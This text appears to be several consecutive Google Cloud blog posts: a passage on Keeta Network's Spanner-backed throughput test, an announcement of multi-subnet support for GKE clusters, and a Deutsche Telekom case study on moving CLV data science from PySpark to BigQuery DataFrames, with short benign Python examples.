The network utilizes a two-step voting process to approve or deny operations. Each transaction must be verified by a set of voting representatives, which occurs prior to updating any ledger. Individual steps rely on Spanner’s ACID (atomicity, consistency, isolation, durability) transactions and strict external consistency to ensure correctness as well as durability in the event of an outage or a network partition.
Keeta Network is unbounded by design, enabling it to scale horizontally to handle the increasing demand of participants. Similarly, Spanner’s scale-out architecture allows for linear read and write scaling in dozens of regions globally, all while maintaining consistency and latency.
Furthermore, representatives can be configured to scale down as throughput requirements decrease. Spanner ensures that scaling up or down is always an online operation, even under the heaviest load. By dynamically adjusting the size of its Spanner instances based on actual demand, Keeta saves money.
Live test results showing more than 10M transactions per second at peak
Testing Keeta’s performance in the real world
Keeta’s Test Network consisted of four representative nodes, each issuing votes on the network. To process the targeted number of transactions, more than 30 million synthetic accounts generated over 25 billion transactions, reading and writing data to Spanner instances in four separate regions. It’s important to note that adding additional representative nodes did not materially change the complexity of the confirmation process.
In order to put the network through its paces, the stress test utilized a “fan out” approach to demonstrate its parallel throughput and immense scale. One account was used to begin the process of distributing funds to every account. This initial source account created numerous blocks, each containing 20 transactions, which were then used to fund an additional 60,000 to 120,000 accounts. Each of these accounts, in turn, sent additional transactions. This process was repeated many times to reach the 30 million total accounts used during the test.
By showcasing this scalability, Keeta is one step closer to its vision – connecting the fragmented global economy. Existing solutions lack the scalability required for traditional financial traffic, making it impossible to connect global finance. Spanner and Google Cloud provide Keeta peace of mind and a significant technical leg up, delivering an infrastructure that can grow at the same pace as its network without significant rebuilding or unpredictable costs.
Keeta shows that blockchain technology is now capable of improving critical operations like cross-border payments, point-of-sale transactions, and asset transfers of all types. To put the addressable market into perspective, consider this: Tens of trillions of dollars worth of value are transferred across outdated financial systems daily — and Keeta Network has proven it has the speed, scale, and security to be the foundation for a new, interconnected ecosystem.
Leaders in industries like financial services, retail, and entertainment and media already rely on Spanner to power their most critical operational workloads. Learn more about how Spanner can help take the stress out of your organization’s next growth milestone and set your development teams up for success.
We are pleased to announce the preview of multi-subnet support for Google Kubernetes Engine (GKE) clusters. This enhancement removes single-subnet limitations, increasing scalability, optimizing resource utilization, and enhancing flexibility of your GKE clusters.
Multi-subnet support for GKE clusters allows you to add additional subnets to an existing GKE cluster, which can then be utilized by new node pools. This functionality is supported for all clusters, using GKE version 1.30.3-gke.1211000 or greater.
Benefits
Increased scalability: Clusters can now scale beyond the limits of a single subnet’s primary IP range.
Optimized resource utilization: IP addresses can be allocated more efficiently across multiple subnets, which reduces IP waste.
Enhanced flexibility: Adding subnets provides more flexibility in managing IP ranges for pods and services. Subnets can be updated without recreating the cluster so you can easily expand beyond initial cluster configurations.
Use case: Node IP exhaustion
Historically, GKE clusters have been created on a single subnet, using its primary IP range. Once all the IPs in the primary range are used, the cluster can no longer add nodes, and therefore cannot expand or autoscale.
The IP exhaustion errors look something like this:
[IP_SPACE_EXHAUSTED_WITH_DETAILS]: Instance 'gke-cluster1-default-pool-45c508b2-2jqt' creation failed: IP space of 'projects/my-project/regions/us-west1/subnetworks/my-subnet1' is exhausted.
To fix this error, we can now use the new multi-subnet feature to add subnets to the cluster. New node pools can use the new subnet and continue to grow the cluster. You can add multiple secondary ranges in the new subnets, in addition to the existing ability to add additional pod ranges to the default subnet. GKE will automatically pick a subnet during node pool creation based on the IP availability in the subnets.
Getting started
To take control of your GKE cluster’s growth, try adding subnets on-demand and scale fearlessly. Use your preferred method to start using multi-subnet support today!
CLI: For a complete list of CLI commands and options, check out the documentation.
API: To learn more about how to use the API, check the API documentation.
In today’s hyper-competitive telecommunications landscape, understanding and maximizing the Customer Lifetime Value (CLV) metric isn’t just a nice-to-have, it’s a strategic imperative. For Deutsche Telekom, accurate CLV calculations are the bedrock of informed decisions, driving crucial initiatives in customer acquisition, retention, and targeted marketing campaigns. The ability to predict and influence long-term customer relationships directly translates to sustained profitability and a competitive edge.
Initially, Deutsche Telekom’s Data Science team processed data within an on-premises data lake environment, leveraging Jupyter notebooks and PySpark. However, this reliance on legacy on-prem data lake systems was creating significant bottlenecks. These systems, designed for a different era of data volume and complexity, struggled to handle the massive datasets required for sophisticated CLV modeling. The result? Extended processing times, limited agility in data science experiments, and a growing gap between potential insights and actionable results.
This challenge demanded a transformative solution, leading Deutsche Telekom to embrace the power of modern cloud infrastructure, specifically Google Cloud’s BigQuery, to unlock the full potential of their data and accelerate their journey towards data-driven innovation. The core of this transformation was the migration of critical data science workloads, beginning with the CLV calculations, to BigQuery.
Deutsche Telekom decided that for distributed Python data processing, they wanted to move off of PySpark-based code and adopt BigQuery DataFrames, a.k.a. BigFrames. BigFrames is an open-source Python library offered by Google that scales Python data processing by transpiling common Python data science APIs to BigQuery SQL. You can read more about BigFrames in the official introduction to BigFrames and refer to the public git repository.
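As a flavor of the API, here is a minimal, hypothetical BigFrames snippet; the project, table, and column names are placeholders, not Deutsche Telekom’s actual CLV logic:

# Minimal sketch: pandas-like code that BigFrames pushes down to BigQuery SQL.
# Project, table, and column names are hypothetical.
import bigframes.pandas as bpd

bpd.options.bigquery.project = "my-example-project"

# Reads lazily from BigQuery; computation runs in BigQuery, not locally.
df = bpd.read_gbq("my_dataset.customer_transactions")

clv_by_segment = (
    df[df["churned"] == False]
    .groupby("customer_segment")["monthly_revenue"]
    .mean()
)

# Materialize the small aggregated result locally as a pandas Series.
print(clv_by_segment.to_pandas())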
This decision was driven by three factors:
Keep it simple: By moving all the data processing to BigQuery, the company would be standardizing on a single data processing technology. This helps in administration and standardization across the organization.
Bet on universal skills: Python and pandas are near-universal data science skills, whereas bringing in Spark would add a learning curve. Because BigFrames is pandas-like and pushes processing down to BigQuery, the move reduces the upskilling required for data science work.
Focus on business logic: Data science teams can focus on core business logic and less on the infrastructure required to make that logic work.
In other words, this move was not just a technical upgrade — it was a strategic shift towards a more agile, efficient, and insight-driven future. By leveraging BigQuery’s ability to process massive datasets quickly and efficiently, along with the tight integration of BigQuery DataFrames and its compatibility with familiar pandas and scikit-learn APIs, Deutsche Telekom aimed to eliminate the bottlenecks that had hindered their data science initiatives. This solution, centered around BigQuery and BigQuery DataFrames, provided the foundation for faster insights, improved decision-making, and ultimately, enhanced customer experiences.
The migration journey
To realize these benefits, Deutsche Telekom meticulously planned a two-phase technical migration strategy, designed to minimize disruption and maximize the speed of achieving tangible business results.
Phase 1: Accelerated transition with AI-powered code conversion
The initial phase focused on rapidly converting the existing code to a format compatible with Google Cloud's environment. This was significantly accelerated by advanced AI tools like Gemini, which streamlined the code conversion process. The team could focus on validating results and ensuring business continuity rather than getting bogged down in lengthy rewrites.
Phase 2: Optimizing for cloud scalability and performance
The second phase involved adapting the data processing to fully leverage BigQuery. This step was crucial for eliminating the performance bottlenecks experienced with the legacy systems. By aligning the data processing with BigQuery's capabilities, Deutsche Telekom unlocked significant improvements in processing speed and scalability, allowing for faster and more insightful data analysis.
The actual effort required to execute these two phases was one person-week. Conversion with Gemini was 95% accurate and worked as expected; in the first phase, most of the time was spent on manual data validation. Furthermore, around 70% of the pandas code worked as BigQuery DataFrames code without modification. Some adjustments were required for data types and scalar functions, as illustrated in the sketch below.
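A minimal sketch of the kind of adjustment involved (the table and column names are hypothetical, not Deutsche Telekom's actual code): row-wise Python lambdas, which would otherwise require a BigQuery remote function, are rewritten as vectorized expressions, and BigQuery's nullable dtypes sometimes call for explicit casts.

import bigframes.pandas as bpd

bpd.options.bigquery.project = "my-project"  # hypothetical project ID

# Hypothetical customer table; all transformations execute in BigQuery.
df = bpd.read_gbq("my-project.telco.customers")

# pandas habit: df["tenure_days"].apply(lambda d: d / 365.25)
# A plain Python lambda would need a BigQuery remote function here, so it
# is rewritten as a vectorized expression that compiles directly to SQL.
df["tenure_years"] = df["tenure_days"] / 365.25

# BigQuery columns surface as pandas nullable dtypes (Int64, Float64, string),
# so some comparisons and joins need explicit casts.
df["contract_code"] = df["contract_code"].astype("Int64")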
Key business benefits of the technical approach:
Deutsche Telekom’s technical migration strategy was not just about moving data; it was about strategically enabling faster, more scalable, and more reliable data-driven decisions. Among the benefits that they saw from this approach were:
Faster time to insight: The accelerated code conversion, powered by AI, significantly reduced the time required to migrate and validate the data, enabling quicker access to critical business insights.
Improved scalability and performance: The transition to BigQuery’s cloud-native architecture eliminated performance bottlenecks and provided the scalability needed to handle growing data volumes.
Reduced operational risk: The structured, two-phase approach minimized disruption and ensured a smooth transition, reducing operational risk.
Leveraging existing expertise: The use of familiar tools and technologies, combined with AI-powered assistance, allowed the team to leverage their existing expertise, minimizing the learning curve.
Of course, a project of this scale presented its own set of unique challenges, but each one was addressed with solutions that further strengthened Deutsche Telekom’s data capabilities and delivered increased business value.
Challenge 1: Ensuring data accuracy at scale
Initially, the test data didn't fully represent the complexities of the real-world data, potentially impacting the accuracy of critical calculations like CLV.
Solution: During the test phase, the team relaxed the filters on the data sources to overcome the limited test data size. They implemented the changes in both the old and new versions of the code so that the outputs could be compared reliably, as sketched below.
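A rough illustration of that comparison step (the table names, join key, and tolerance below are hypothetical, not the actual validation code):

import bigframes.pandas as bpd

# Hypothetical output tables from the legacy pipeline and the migrated
# BigFrames pipeline, both run over the same filter-relaxed input data.
legacy = bpd.read_gbq("my-project.validation.clv_legacy")
migrated = bpd.read_gbq("my-project.validation.clv_bigframes")

# Join on the customer key and compare CLV values within a tolerance,
# since aggregation order can differ between engines.
joined = legacy.merge(migrated, on="customer_id", suffixes=("_old", "_new"))
joined["abs_diff"] = (joined["clv_old"] - joined["clv_new"]).abs()

mismatches = joined[joined["abs_diff"] > 0.01]
print(f"{mismatches.shape[0]} of {joined.shape[0]} customers differ by > 0.01")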
Challenge 2: Maintaining robust security and compliance
Balancing the need for data access with stringent security and compliance requirements was an important consideration. The BigQuery DataFrames documentation notes that some features, such as remote functions, require admin-level IAM privileges, which may not be possible to grant in enterprise environments.
Solution: Deutsche Telekom developed customized IAM roles that met its security standards while enabling data access for authorized users. This helped ensure data security and compliance while supporting business agility.
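As a hedged sketch of what such a least-privilege setup can look like (the role ID and permission list are purely illustrative; the actual role definition Deutsche Telekom uses isn't published), a custom role can be created with the IAM API:

from googleapiclient import discovery
import google.auth

# Authenticate with application-default credentials.
credentials, project_id = google.auth.default()
iam = discovery.build("iam", "v1", credentials=credentials)

# Illustrative permission set for BigQuery DataFrames users; the real role
# should come out of your organization's own security review.
role_body = {
    "roleId": "bigframesDataScientist",
    "role": {
        "title": "BigFrames Data Scientist",
        "description": "Least-privilege role for BigQuery DataFrames users.",
        "includedPermissions": [
            "bigquery.jobs.create",
            "bigquery.datasets.get",
            "bigquery.tables.get",
            "bigquery.tables.getData",
            "bigquery.readsessions.create",
        ],
        "stage": "GA",
    },
}

response = iam.projects().roles().create(
    parent=f"projects/{project_id}", body=role_body
).execute()
print(response["name"])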
By addressing these challenges strategically, Deutsche Telekom not only completed a successful migration but also delivered tangible business benefits: a more agile, scalable, and secure data platform that enables faster, better-informed decisions and, ultimately, a better customer experience.
Deutsche Telekom's move to BigQuery was a strategic transformation, not just a technical one. By overcoming the limitations of its legacy systems and embracing cloud-based data processing, the company has established a robust foundation for future innovation. The project also underscores the value of strategic partnerships and collaborative problem-solving, showing how Google Cloud's technologies and expert consulting can help businesses thrive in a data-driven future.
Ready to unlock the full potential of your data?
Whether you're facing similar challenges with legacy systems or seeking to accelerate your data science initiatives, Google Cloud's data platform can provide the solutions you need. Explore the capabilities of BigQuery and BigQuery DataFrames, and discover how our expert consultants can guide you through a seamless cloud migration.
Contact Google Cloud Consulting today to discuss your specific needs and embark on your own journey towards data-driven innovation.
A special thanks to Googler Rohit Naidu, Strategic Cloud Engineer, for his contributions to this post.